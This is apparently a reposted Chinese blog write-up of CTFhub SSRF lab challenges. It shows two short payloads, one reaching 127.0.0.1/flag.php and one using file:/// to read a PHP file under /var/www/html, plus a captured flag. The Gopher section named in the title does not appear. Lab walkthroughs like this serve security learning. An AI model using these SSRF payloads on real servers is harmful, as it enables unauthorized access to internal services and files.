首页 > 编程入门 文章详情

SSRF(3)伪协议读取文件Gopher协议的利用

编程入门 行业动态 更新时间:2024-10-05 15:23:20

SSRF(3)伪<a href=https://www.elefans.com/category/jswz/34/1771197.html style=协议读取文件Gopher协议的利用"/>

SSRF(3)伪协议读取文件Gopher协议的利用

一:Http、Dict和file等协议的利用

1,内网访问

所以构造:

/?url=http://127.0.0.1/flag.php

得到:

ctfhub{ce475b59a4baee959112777b}

2,伪协议读取文件

最经典的PHP伪协议就是file:///协议了,可以用来读取php源码

构造payload:

/?url=file:///var/www/html/flag.php

 得到:

在单击右键查看源代码:

更多推荐

SSRF(3)伪协议读取文件Gopher协议的利用

本文发布于:2024-03-09 03:19:58,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1723595.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:协议   文件   SSRF   Gopher

发布评论

评论列表 (有 0 条评论)

最近发表

草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!

热门文章

标签列表